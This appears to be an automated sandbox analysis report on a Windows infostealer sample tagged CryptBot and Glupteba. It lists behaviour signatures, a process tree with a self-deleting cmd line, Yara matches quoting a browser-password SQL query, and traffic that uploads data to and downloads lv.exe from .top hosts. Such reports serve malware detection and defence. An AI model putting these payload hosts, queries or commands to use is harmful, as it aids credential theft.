Play interactive tour

Edit tour

Analysis Report SecuriteInfo.com.W32.AIDetect.malware1.24453.7436

Overview

General Information

Sample Name:	SecuriteInfo.com.W32.AIDetect.malware1.24453.7436 (renamed file extension from 7436 to exe)
Analysis ID:	385467
MD5:	5e3189812e802c0fd68ce592cb1e1999
SHA1:	38552111d3001f4998ab85408601873897653360
SHA256:	f42553b4409992bbddc1df8b716596727762a191055cd2eebb3ced648cf5384f
Tags:	CryptBot
Infos:
Most interesting Screenshot:

Detection

Cryptbot Glupteba

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected Cryptbot

Yara detected Glupteba

Contains functionality to register a low level keyboard hook

Delayed program exit found

Found many strings related to Crypto-Wallets (likely being stolen)

Machine Learning detection for dropped file

Machine Learning detection for sample

Tries to harvest and steal browser information (history, passwords, etc)

Abnormal high CPU Usage

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

Is looking for software installed on the system

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains sections with non-standard names

PE file contains strange resources

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Startup

System is w10x64

SecuriteInfo.com.W32.AIDetect.malware1.24453.exe (PID: 5964 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe' MD5: 5E3189812E802C0FD68CE592CB1E1999)

Murano.exe (PID: 5520 cmdline: 'C:\Users\user\AppData\Local\Temp\Murano.exe' MD5: AFF6F8C7521796D3BC8FC1059DBE2409)

4.exe (PID: 2876 cmdline: C:\Users\user\AppData\Local\Temp\New Feature\4.exe MD5: E99CED09C77FFEC9F09B33642E9B0E99)

SmartClock.exe (PID: 1632 cmdline: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe MD5: E99CED09C77FFEC9F09B33642E9B0E99)

vpn.exe (PID: 4324 cmdline: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe MD5: 0FDA9A85AEDF1487A6D58E4031F72E2D)

makecab.exe (PID: 984 cmdline: 'C:\Windows\System32\makecab.exe' MD5: D0D74264402D9F402615F22258330EC8)

conhost.exe (PID: 2900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

makecab.exe (PID: 3620 cmdline: 'C:\Windows\System32\makecab.exe' MD5: D0D74264402D9F402615F22258330EC8)

conhost.exe (PID: 6808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

makecab.exe (PID: 5292 cmdline: 'C:\Windows\System32\makecab.exe' MD5: D0D74264402D9F402615F22258330EC8)

conhost.exe (PID: 6788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

makecab.exe (PID: 6728 cmdline: 'C:\Windows\System32\makecab.exe' MD5: D0D74264402D9F402615F22258330EC8)

conhost.exe (PID: 852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

makecab.exe (PID: 5240 cmdline: 'C:\Windows\System32\makecab.exe' MD5: D0D74264402D9F402615F22258330EC8)

conhost.exe (PID: 5188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

makecab.exe (PID: 5652 cmdline: 'C:\Windows\System32\makecab.exe' MD5: D0D74264402D9F402615F22258330EC8)

conhost.exe (PID: 5696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

makecab.exe (PID: 4660 cmdline: 'C:\Windows\System32\makecab.exe' MD5: D0D74264402D9F402615F22258330EC8)

conhost.exe (PID: 6964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 5492 cmdline: 'C:\Windows\System32\cmd.exe' /c C:\Windows\System32\cmd.exe < Scoprirvi.eps MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6020 cmdline: 'C:\Windows\system32\cmd.exe' /c rd /s /q C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk & timeout 3 & del /f /q 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

timeout.exe (PID: 4188 cmdline: timeout 3 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)

SmartClock.exe (PID: 6884 cmdline: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe MD5: E99CED09C77FFEC9F09B33642E9B0E99)

SmartClock.exe (PID: 5368 cmdline: 'C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe' MD5: E99CED09C77FFEC9F09B33642E9B0E99)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp	OlympicDestroyer_1	OlympicDestroyer Payload	kevoreilly	0xc6fc8:$string1: SELECT origin_url, username_value, password_value FROM logins 0xcfc04:$string2: API call with %s database connection pointer 0xd07e0:$string3: os_win.c:%d: (%lu) %s(%s) - %s
00000000.00000002.383574469.0000000005B00000.00000040.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.231267121.0000000005BE0000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.231267121.0000000005BE0000.00000004.00000001.sdmp	OlympicDestroyer_1	OlympicDestroyer Payload	kevoreilly	0xc59c8:$string1: SELECT origin_url, username_value, password_value FROM logins 0xce604:$string2: API call with %s database connection pointer 0xcf1e0:$string3: os_win.c:%d: (%lu) %s(%s) - %s
Process Memory Space: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe PID: 5964	JoeSecurity_Glupteba_1	Yara detected Glupteba	Joe Security
Process Memory Space: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe PID: 5964	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe PID: 5964	JoeSecurity_Cryptbot	Yara detected Cryptbot	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.400000.0.unpack	OlympicDestroyer_1	OlympicDestroyer Payload	kevoreilly	0xc59c8:$string1: SELECT origin_url, username_value, password_value FROM logins 0xce604:$string2: API call with %s database connection pointer 0xcf1e0:$string3: os_win.c:%d: (%lu) %s(%s) - %s
0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.5b00e50.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.5b00e50.5.unpack	OlympicDestroyer_1	OlympicDestroyer Payload	kevoreilly	0xc43c8:$string1: SELECT origin_url, username_value, password_value FROM logins 0xcd004:$string2: API call with %s database connection pointer 0xcdbe0:$string3: os_win.c:%d: (%lu) %s(%s) - %s
0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.400000.0.raw.unpack	OlympicDestroyer_1	OlympicDestroyer Payload	kevoreilly	0xc6fc8:$string1: SELECT origin_url, username_value, password_value FROM logins 0xcfc04:$string2: API call with %s database connection pointer 0xd07e0:$string3: os_win.c:%d: (%lu) %s(%s) - %s
0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.5b00e50.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.5b00e50.5.raw.unpack	OlympicDestroyer_1	OlympicDestroyer Payload	kevoreilly	0xc59c8:$string1: SELECT origin_url, username_value, password_value FROM logins 0xce604:$string2: API call with %s database connection pointer 0xcf1e0:$string3: os_win.c:%d: (%lu) %s(%s) - %s
0.3.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.5be0000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.3.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.5be0000.0.raw.unpack	OlympicDestroyer_1	OlympicDestroyer Payload	kevoreilly	0xc59c8:$string1: SELECT origin_url, username_value, password_value FROM logins 0xce604:$string2: API call with %s database connection pointer 0xcf1e0:$string3: os_win.c:%d: (%lu) %s(%s) - %s
Click to see the 5 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for domain / URL

Show sources

Source: awumad01.top

Virustotal: Detection: 7%

Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\lv[1].exe	ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\Murano.exe	ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	ReversingLabs: Detection: 37%
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	ReversingLabs: Detection: 14%
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	ReversingLabs: Detection: 37%

Multi AV Scanner detection for submitted file

Show sources

Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Virustotal: Detection: 30%			Perma Link
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	ReversingLabs: Detection: 33%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Murano.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\lv[1].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_00401270 GetFileAttributesW,CryptUnprotectData,LocalFree,UnmapViewOfFile,CloseHandle,FindCloseChangeNotification,CloseHandle,	0_2_00401270
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_0040410E CryptUnprotectData,CryptUnprotectData,	0_2_0040410E
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_0040426D CryptUnprotectData,CryptUnprotectData,	0_2_0040426D
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_00401470 CryptUnprotectData,LocalFree,	0_2_00401470
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_00404400 ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,CryptUnprotectData,CryptUnprotectData,	0_2_00404400
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_0040365A ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,CryptUnprotectData,	0_2_0040365A
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_00403600 ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,CryptUnprotectData,	0_2_00403600

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Unpacked PE file: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Unpacked PE file: 16.2.4.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Unpacked PE file: 22.2.SmartClock.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Unpacked PE file: 25.2.SmartClock.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Unpacked PE file: 33.2.SmartClock.exe.400000.0.unpack

Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_0040F1D0 FindFirstFileW,FindNextFileW,FindClose,	0_2_0040F1D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_00414650 ExpandEnvironmentStringsW,FindFirstFileW,FindFirstFileW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,	0_2_00414650
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_0041469B FindFirstFileW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,CopyFileW,ExpandEnvironmentStringsW,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,	0_2_0041469B
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_00416AC0 FindFirstFileW,FindFirstFileW,	0_2_00416AC0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_00416C3A CopyFileW,ExpandEnvironmentStringsW,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,	0_2_00416C3A
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_0040F259 FindFirstFileW,FindNextFileW,FindClose,	0_2_0040F259
Source: C:\Users\user\AppData\Local\Temp\Murano.exe	Code function: 13_2_00406301 FindFirstFileW,FindClose,	13_2_00406301
Source: C:\Users\user\AppData\Local\Temp\Murano.exe	Code function: 13_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	13_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_0040F64C FindFirstFileExW,	16_2_0040F64C
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_03F5F89C FindFirstFileExW,	16_2_03F5F89C
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Code function: 18_2_00403117 FindFirstFileW,FindClose,SetLastError,CompareFileTime,	18_2_00403117
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Code function: 18_2_00408FA7 ??2@YAPAXI@Z,FindFirstFileW,FindClose,	18_2_00408FA7
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Code function: 18_2_00402A0B FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,	18_2_00402A0B
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Code function: 18_2_00402B28 FindFirstFileW,FindClose,SetFileAttributesW,DeleteFileW,	18_2_00402B28
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_0040F64C FindFirstFileExW,	22_2_0040F64C
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_05A0F89C FindFirstFileExW,	22_2_05A0F89C
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_0040F64C FindFirstFileExW,	25_2_0040F64C
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_059DF89C FindFirstFileExW,	25_2_059DF89C

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	File opened: C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\files_	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	File opened: C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 12 Apr 2021 13:12:19 GMTServer: Apache/2.2.22 (@RELEASE@)Last-Modified: Mon, 12 Apr 2021 02:46:58 GMTETag: "320648-132ebb-5bfbd8703eb96"Accept-Ranges: bytesContent-Length: 1257147Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 7a 07 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 e0 16 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac 00 00 b4 00 00 00 00 00 16 00 e8 c9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 08 00 94 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 72 00 00 00 10 00 00 00 74 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 2b 00 00 00 90 00 00 00 2c 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2b 07 00 00 c0 00 00 00 02 00 00 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 0e 00 00 f0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e8 c9 00 00 00 00 16 00 00 ca 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d6 0f 00 00 00 d0 16 00 00 10 00 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: Joe Sandbox View

ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC

Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------jmACsrpgBVBRjTxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36Host: aufsvg12.topContent-Length: 67238Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------pwDccphxPeFIadjUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36Host: mardeq01.topContent-Length: 67223Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download.php?file=lv.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: awumad01.topConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /downfiles/lv.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: awumad01.topConnection: Keep-Alive

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe

Code function: 0_2_0040C561 Sleep,Sleep,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,ExitProcess,CreateDirectoryW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,Sleep,ExpandEnvironmentStringsW,DeleteFileW,Sleep,URLDownloadToFileW,Sleep,ShellExecuteW,ExitProcess,

0_2_0040C561

Source: global traffic	HTTP traffic detected: GET /download.php?file=lv.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: awumad01.topConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /downfiles/lv.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: awumad01.topConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: aufsvg12.top

Source: unknown

HTTP traffic detected: POST /index.php HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------jmACsrpgBVBRjTxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36Host: aufsvg12.topContent-Length: 67238Cache-Control: no-cache

Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.383766722.0000000005C63000.00000004.00000001.sdmp	String found in binary or memory: http://aufsvg12.top/index.php
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.383709949.0000000005C16000.00000004.00000001.sdmp	String found in binary or memory: http://aufsvg12.top/index.php)
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.383709949.0000000005C16000.00000004.00000001.sdmp	String found in binary or memory: http://aufsvg12.top/index.phpz
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.383529704.0000000004207000.00000004.00000001.sdmp	String found in binary or memory: http://awumad01.top/downfiles/lv.exe
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.383709949.0000000005C16000.00000004.00000001.sdmp	String found in binary or memory: http://awumad01.top/downfiles/lv.exeaC:
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.377076214.0000000005C65000.00000004.00000001.sdmp	String found in binary or memory: http://awumad01.top/download.php?file=lv.exe
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp	String found in binary or memory: http://awumad01.top/download.php?file=lv.exeopenBOOLEANBIT
